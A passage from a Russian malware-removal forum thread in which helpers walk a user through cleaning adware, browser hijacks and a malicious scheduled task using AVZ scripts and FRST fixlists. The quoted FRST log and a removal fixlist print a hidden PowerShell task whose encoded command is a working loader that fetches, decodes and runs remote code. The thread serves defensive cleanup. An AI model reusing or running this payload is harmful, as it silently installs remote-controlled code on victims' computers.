Тормозят браузеры, редирект и pop up окна [not-a-virus:AdWare.Win32.Agent.jugo ]

Добрый день.

Проблема следующего характера - тормозят браузеры (Opera/Chrome/Firefox), при этом периодически происходит редирект на "левые" сайты и появляются всплывающие pop up окна. Остальных проблем пока не выявлено.

Логи прилагаю.

Уважаемый(ая) [B]Molotoff[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в [URL="http://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="http://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

AVZ [URL=http://virusinfo.info/showthread.php?t=7239&p=88804&viewfull=1#post88804]выполнить следующий скрипт[/URL].
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
[CODE]
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
DelBHO('{5657A9A6-6D99-4753-B5F5-0450BB56F54B}');
StopService('BAPIDRV');
DeleteService('BAPIDRV');
QuarantineFile('C:\Program Files\TNT2\2.0.0.2030\IEToolbar.dll','');
QuarantineFile('C:\PROGRA~2\9d857855\cf83fce6.dll','');
QuarantineFile('C:\Windows\system32\DRIVERS\BAPIDRV.sys','');
DeleteFile('C:\Program Files\TNT2\2.0.0.2030\IEToolbar.dll','32');
DeleteFile('C:\PROGRA~2\9d857855\cf83fce6.dll','32');
DeleteFile('C:\Windows\system32\DRIVERS\BAPIDRV.sys','32');
DeleteFile('C:\Windows\system32\Tasks\{045F7884-8C2A-6096-3A72-45BDBF614B07}','32');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
[/CODE]

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:
[CODE]
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
[/CODE]
Файл quarantine.zip из папки AVZ загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.


- Подготовьте лог [URL="http://virusinfo.info/showthread.php?t=146192&p=1041844&viewfull=1#post1041844"]AdwCleaner[/URL] и приложите его в теме.

- Сделайте лог [URL=http://virusinfo.info/soft/tool.php?tool=checkbrowserlnk]Check Browsers' LNK[/URL] и приложите его в теме.

Выполнено.

[url=http://virusinfo.info/showthread.php?t=146192&p=1041864&viewfull=1#post1041864]Удалите в AdwCleaner[/url] всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

Все удалил, но всплывающие окна еще появляются.

- Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.

[b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
[list][*]Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.[*]Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]"List BCD"[/i] и [i]"Driver MD5"[/i].
[img]http://i.imgur.com/B92LqRQ.png[/img][*]Нажмите кнопку [b]Scan[/b].[*]После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.[*]Если программа была запущена в первый раз, будет создан отчет ([b]Addition.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.[/list]

Выполнено

Знакомы расширения в Google chrome?
[CODE]FF NewTab: chrome://fvd.speeddial/content/fvd_about_blank.html
FF Homepage: chrome://fvd.speeddial/content/fvd_about_blank.html
FF Extension: Speed Dial [FVD] - New Tab Page, Sync... - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\[email protected] [2016-02-13][/CODE]


Знакома ли Вам следующая задача в планировщике задач?
[QUOTE]Task: {A96E3C2A-1419-400D-B440-8C6BAFAA65F5} - System32\Tasks\{AC3F93E0-C15D-BB72-B94F-9A6756EE64CA} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand OwA7ADsAIAAgACAAIAAgACAAOwAgACAAOwAgADsAOwAgACAAIAA7ADsAOwAgADsAIAAgADsAOwA7ADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAVgBlAHIAYgBvAHMAZQBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAEQAZQBiAHUAZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAKAGYAdQBuAGMAdABpAG8AbgAgAFUATgBSAFEAUwBZAFAAQQAoACQAcAApAHsAJABuAD0AIgBXAGkAbgBkAG8AdwBQAG8AcwBpAHQAaQBvAG4AIgA7AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewA7AH0AdAByAHkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMgAwADEAMwAyADkANgA2ADQAfABPAHUAdAAtAE4AdQBsAGwAOwAKAH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9ACAAfQAgAH0AVQBOAFIAUQBTAFkAUABBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXwB2ADEALgAwAF8AcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAKQA7AFUATgBSAFEAUwBZAFAAQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcACUAUwB5AHMAdABlAG0AUgBvAG8AdAAlAF8AUwB5AHMAdABlAG0AMwAyAF8AcwB2AGMAaABvAHMAdAAuAGUAeABlACIAKQA7AFUATgBSAFEAUwBZAFAAQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcAHQAYQBzAGsAZQBuAGcALgBlAHgAZQAiACkAOwAKACQAcwB1AHIAbAA9ACIAaAB0AHQAcAA6AC8ALwBwAGEAbgBlAGwAagBvAGIALgBpAG4AZgBvAC8AdQAvAD8AcQA9AGsAdQBqAE0AVQBhAHkAUwBsAEsAMABaAGsAZwBLAHIAaQBwAFMAeQBVAEUAbQBUAFAALQB0ADkAMABLAGQAUQBpAGgAdgBMAEIALQBpAFIAUQB1AFMAVQA5AFQAQwB6ADkAZABpAEgAUwBXAHkAMQB4ADgATwAtAEUARwBKAEkAOAAtAFEAVgAtAEYAYgBrAGMAeQA2AEIAdABBAFMAUgBMAGwAbQBUAG4AWABYAEwATQB0AG8AcABNAGEASwAyAHYAYgAyAGcAVgBXADkAZQBNADMATQByAHAAUwBmAGUAOABkAFgAcABsAGYAMwBCAHgAdgBIAGgAYwBpAFQAcgBUAGYAUwBNAFQAOAAyADcARwBQAFYAaABCAGEAbQBhAEkANwBRAFgASgB6ADcAegBkAGwAVwBKAGwAMQBoAE4AYgBUAEEAVgByAFQAUABNAGkAQQBfADMANQAwADAAaQBhAFUAWABnAEYATQBOAHMAQQA1AE0AdQBrADgAdABRADQATwBJADQAXwBtAEoAcQBGAFkAYQA0AGkAcwBmAGgAdABjADEAWgBkAE4AVQB4AGIAUgBhAFQAUwA2AEIAMgBmAEUAQwBsAGcAVwA0AGMAeABGADMAbQA0AE4ASQBNAFQAeQB6AGYAZAA5ADgAdABTAE4AUABmAHIAYwBuAGYAeQBtADYAbwBGAFQAcgBMAFEAOABJAG8ALQBCAEkAcQBtAHYARQByAFMAUgBTAHEASABmAGMAcgBxADAAYgBLAHQAQgBnAE4AbABiAHgAcgBqAEgAWQB3AFUAbgBXAGEANQBZADMAZwAwADgAbwBiADQAMwAxAG0ANAA0AHgAZwBDAFcAcgBlAGwAYgBoAHMAQgBhAEQAZABiAFQASgBWAGMAVAB3AC0AUQAtAEsARQBYAFkAOQBGADYAMgByAFQAQwBqAFoAZAAzAFIAcgBTAC0AWAA4AEkAdgB3ADgASgBJAFgATQA3AFoATQBjAEsASgBkAGIAWQAzAFEAOABlAHIAMQA5AGsAUgBsAGcAQQBTAHAAaQBYAGcAMwBpAEgATgA4AGUAUABCAC0AawBlAC0ARAAzAHkANAB6AFkANAA0AEYANQB6AEsAdAA2AFgAdwAtAEsARwBCAC0ATAB4AGIAZwB1AF8AeABfAFgAZgBqAGQANwBOADMAUQBoAEcANQB0AE4AWQBEAGQARABCADYAagA4AGUASgBIAHoARQA5ADkAOQBsAFIAawBwAGwAdQB5AF8AOQAtAFUAawBGADAAdwAtAGMATwB4AGoAZABlAHgAbgBmAGwAeAByAEYAYgAyAGIATgBRAEQAMgBHAHkATwBtAEMAYgBkAGYAawA4AFkASwBmAGIAMgBJAGsAYgA1AHIAMgBzAEIAYQBJADAAcgBsAGMAUQBfAFEAagBMAGYAQgA2ADYAdABQAEgAUgBQAE0AUwBaAHAALQBVACYAYwA9AEUAVgA3AEcARgBRAEEAMAA3AG8ARgA3ADcAWQBlAE8AVwA0AGYATQBpAHEAUgA4AFUAWAA1ADUAMQBfAFoAeAAwAFEAaABEAHUAdQB4AFMAZwBVADQAUABXAEcAQwBKAHgAUgBiAE4ATQB1ADcAbAB5AEIAdwBxAGoAZwBMAF8AQwB4ADkASABlAEUAQgB6AFYAWQBEADQAVQBOAFIAUQBTAFkAUABBAG4ANQBxAFcAbwB6AGcAWgBVAGkALQBDAEcAeQBSAFUAUQBRAG0AZwBvAFUAYQBaAE4AagBwADgAZQB3AFoAZABKAHkAaABzADYAdQBGAFcATwBNAFUAWgBDADQAdQBfAFIAQwA3AFIAUQBUAGwANgBxADAATgAyAEsARAAzAHYAXwBnAFYARQB0AHEATwB1AFAAVwBMAFEAWgBrAHQATQBLAFEAQgBNAFIATgBlAGEAaQB4AEwAUQA1AE4AQQBrAG4AeQBwAEgANwBOAHQAUQBBAEIAaAAtADcAcABFAHUARgBEAHUAdQB5AHEASABJADUARABDADEAUgBFAGsAVwBZAEwANQBTAGsAZgBKAFkANAB1AF8ASwBEAFkAZwBYAG0ARgB1AGgAaQBXAHQAQQBzAFgAQwA3AGIAaQBHAGEAcABBADkATgBaAEwAWgBCAEYAYwBkAEwAZgBjAGYANgBwAHcATQBrAFkAbQA1AFMAdgBiAFEAYgB5AEoAVgBWADUAYgBPAFgASQBqAFIAcgBNAFoAYwAwAFAATgA1AE8AaQBCAGMAMQA5AHgARwBfAG4AMwBKADcATQBPAHoAUgBWADkAdAA3AEMAWAA2AEYAbAB4AEEAZgAzAFUAQQA2AEwAMABfAHAAQgBFADUAawBGAFIASQBkAEYAbgBjAEIANABBAE4AZgB6AHMAYwBKADAASQBRAEwAdQBoAE4AcwBGAHgAeQBSADAAWQBQAGQAVABXAEYAZQBHADgAdAAzAGMAcwAtAG8AQgB6AFcAWQBwAE8ASgBJAEIAOABTAFkAVwBoAEoAaABIAEsAZgBaADYARwBNAEMAcgBqAEIASQBRAFoAZQBhAFoAawB5ADQAQgA4AGoASgBPAFgAMABtAEIASABUAHgAZwBfADEAWQByAHIAMAA3AGwAUwBPADkAOQBJAFYAUwA4AHMATAB4AGkAWAB0ADkAcgB6AHQAUgBwAG4AQgBEAGsASgB4AGIAcQB5AEEAOQBMAF8AdgBmAEIAbwBUADYASQBrAGcAQgBiAFkAVwBlAFYAMQBZAHMAcwB5AFYASQAtAF8ASgBYAHkAYwBmAEsAcQBIAEMAdgBjADEALQBlAFAAbABVAFUAaQBaAGsAbABnAE8AWQBxADUATwAzADkAdABMAF8AeQBtAEYAUQBuAHIAaABKAEQAQwBnAEIAbgBIAFgAVABKAFoAcQAzAHkAbQA2AEQAaQBsAEEANAAtADUAbABvAEQAVQBqAGEAMQBYAHcATgBvAG4ARAB4AGoAUQB4AHMAOQA4AHgAQQBnAE4AegAtAFQAWQBfAFEAeQBWAGYARAB6AHUAeAAtAGsAZQBKAEoAbwBaAGMASAB4AFcAUwBaADMAeABBAGEAOABOADUATQAyAFIAXwBwADYAUgB4AHQASABIAFgAYQBJAG4AagAwADcAMgBoAFoAagBfAE0AdgBsAHoAMgBoAF8AUABfAHQAdwB6AGcAUwBfAGQAOABUAFMAUgBSAE4AOABpAEYATwBwAHoATgA3AFoAQgAtAHUARQBoAEUAUwBQAFIASABaAE4AWABfAHQARABuAFcAagBIAHMAWQBCADMAbwBEAGkASgBhACYAcgA9ADMAMgAwADIAMgAzADMANgA1ADQAMwAxADcANwA0ADQAMgA3ADYAIgA7ACQAcwB0AHMAawA9ACIAewBBAEMAMwBGADkAMwBFADAALQBDADEANQBEAC0AQgBCADcAMgAtAEIAOQA0AEYALQA5AEEANgA3ADUANgBFAEUANgA0AEMAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAEQAVAAiADsAJABpAG4AaQBkAD0AIgAwACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsACgB9ADsAfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7ADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAFEATwBVAFAATQBNAFMATABEAEMAQgAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAE0AWQBUAEMAVQBIAEEAUQBZAFcAVQBPAFQAUQBDACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AAoAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA7AH0ACgAkAHMAYwA9AE0AWQBUAEMAVQBIAEEAUQBZAFcAVQBPAFQAUQBDACgAUQBPAFUAUABNAE0AUwBMAEQAQwBCACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAIAB9ADsAZQB4AGkAdAAgADAAOwA=[/QUOTE]


[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-396966855-316378592-212668334-1000 -> eShield - {5657A9A6-6D99-4753-B5F5-0450BB56F54B} - C:\Program Files\TNT2\2.0.0.2030\IEToolbar.dll No File
CHR Extension: (No Name) - C:\Users\IlyinBoris\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdefnbcpjeflgggkipfemfckjicceiii [2016-02-20]
OPR Extension: (No Name) - C:\Users\IlyinBoris\AppData\Roaming\Opera Software\Opera Stable\Extensions\lpeofjegddnliokakpdejbnafmdcihdc [2016-02-20]
2016-02-20 08:56 - 2016-02-20 08:56 - 00000000 ____D C:\Users\Все пользователи\bd45723b-0673-0
2016-02-20 08:56 - 2016-02-20 08:56 - 00000000 ____D C:\ProgramData\bd45723b-0673-0
2016-02-20 08:51 - 2016-02-20 15:23 - 00000000 ____D C:\Users\Все пользователи\9d857855
2016-02-20 08:51 - 2016-02-20 15:23 - 00000000 ____D C:\ProgramData\9d857855
2016-02-20 08:51 - 2016-02-20 08:51 - 00000000 ____D C:\Users\Все пользователи\bd45723b-32b5-0
2016-02-20 08:51 - 2016-02-20 08:51 - 00000000 ____D C:\ProgramData\bd45723b-32b5-0
2016-02-20 08:52 - 2016-01-13 23:14 - 00000000 ____D C:\Users\Все пользователи\55f510af-5de3-1
2016-02-20 08:52 - 2016-01-13 23:14 - 00000000 ____D C:\ProgramData\55f510af-5de3-1
2016-02-20 08:51 - 2016-01-13 23:14 - 00000000 ____D C:\Users\Все пользователи\55f510af-57d7-0
2016-02-20 08:51 - 2016-01-13 23:14 - 00000000 ____D C:\ProgramData\55f510af-57d7-0
C:\Users\IlyinBoris\AppData\Local\Temp\{10E372BA-EB23-4880-8C68-0A1974ABFDEA}.dll
C:\Users\IlyinBoris\AppData\Local\Temp\{7119B76B-831D-4E0C-B41B-18A8CDD6C399}.dll
C:\Users\IlyinBoris\AppData\Local\Temp\{7E9C4DA1-8154-4EF9-98B5-96986D77D842}.dll
C:\Users\IlyinBoris\AppData\Local\Temp\{8D06E5B9-5820-4286-97D2-DCE6281DA2F7}.dll
C:\Users\IlyinBoris\AppData\Local\Temp\{98BE41D2-2A75-468F-9590-B25647F90878}.dll
C:\Users\IlyinBoris\AppData\Local\Temp\{9F1E3469-BE90-4577-BC51-84D60CCC7A50}.dll
C:\Users\IlyinBoris\AppData\Local\Temp\{FB447DCF-8089-4125-A851-9859E4A8CB81}.dll
CustomCLSID: HKU\S-1-5-21-396966855-316378592-212668334-1000_Classes\CLSID\{5657A9A6-6D99-4753-B5F5-0450BB56F54B}\InprocServer32 -> C:\Program Files\TNT2\2.0.0.2030\IEToolbar.dll => No File
Task: {3A180A6C-A248-4769-B220-58079E4E2BDB} - \{045F7884-8C2A-6096-3A72-45BDBF614B07} -> No File <==== ATTENTION
Task: {C6FF3D16-8765-49C4-A0FE-68D744CD8561} - no filepath
Task: {F1103D4A-2C92-44AE-B559-688CF8581291} - System32\Tasks\VKSaverUpdate => C:\ProgramData\VKSaver\VKSaver.exe [2015-06-15] (AudioVkontakte.ru) <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:D8999815
AlternateDataStreams: C:\Users\IlyinBoris\Documents\pismo IDSTU.jpeg:3or4kl4x13tuuug3Byamue2s4b
AlternateDataStreams: C:\Users\IlyinBoris\Documents\pismo IDSTU.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
AlternateDataStreams: C:\Users\Все пользователи\TEMP:D8999815
Reboot:
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]

ни задача ни расширения эти мне не знакомы. Лог прилагаю

Для удаление расширений в google chrome:
[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
FF NewTab: chrome://fvd.speeddial/content/fvd_about_blank.html
FF Homepage: chrome://fvd.speeddial/content/fvd_about_blank.html
FF Extension: Speed Dial [FVD] - New Tab Page, Sync... - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\[email protected] [2016-02-13]
Reboot:
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]

по задачи в планировщике задач, убедитесь, чтобы она не принадлежало например приложению 1С.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Похоже на вредонос, я Вам отправил раскодированный текст в лс, ознакомьтесь если также в этом убеждены примените следующий фикс.
[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
Task: {A96E3C2A-1419-400D-B440-8C6BAFAA65F5} - System32\Tasks\{AC3F93E0-C15D-BB72-B94F-9A6756EE64CA} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand OwA7ADsAIAAgACAAIAAgACAAOwAgACAAOwAgADsAOwAgACAAIAA7ADsAOwAgADsAIAAgADsAOwA7ADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAVgBlAHIAYgBvAHMAZQBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAEQAZQBiAHUAZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAKAGYAdQBuAGMAdABpAG8AbgAgAFUATgBSAFEAUwBZAFAAQQAoACQAcAApAHsAJABuAD0AIgBXAGkAbgBkAG8AdwBQAG8AcwBpAHQAaQBvAG4AIgA7AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewA7AH0AdAByAHkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMgAwADEAMwAyADkANgA2ADQAfABPAHUAdAAtAE4AdQBsAGwAOwAKAH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9ACAAfQAgAH0AVQBOAFIAUQBTAFkAUABBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXwB2ADEALgAwAF8AcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAKQA7AFUATgBSAFEAUwBZAFAAQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcACUAUwB5AHMAdABlAG0AUgBvAG8AdAAlAF8AUwB5AHMAdABlAG0AMwAyAF8AcwB2AGMAaABvAHMAdAAuAGUAeABlACIAKQA7AFUATgBSAFEAUwBZAFAAQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcAHQAYQBzAGsAZQBuAGcALgBlAHgAZQAiACkAOwAKACQAcwB1AHIAbAA9ACIAaAB0AHQAcAA6AC8ALwBwAGEAbgBlAGwAagBvAGIALgBpAG4AZgBvAC8AdQAvAD8AcQA9AGsAdQBqAE0AVQBhAHkAUwBsAEsAMABaAGsAZwBLAHIAaQBwAFMAeQBVAEUAbQBUAFAALQB0ADkAMABLAGQAUQBpAGgAdgBMAEIALQBpAFIAUQB1AFMAVQA5AFQAQwB6ADkAZABpAEgAUwBXAHkAMQB4ADgATwAtAEUARwBKAEkAOAAtAFEAVgAtAEYAYgBrAGMAeQA2AE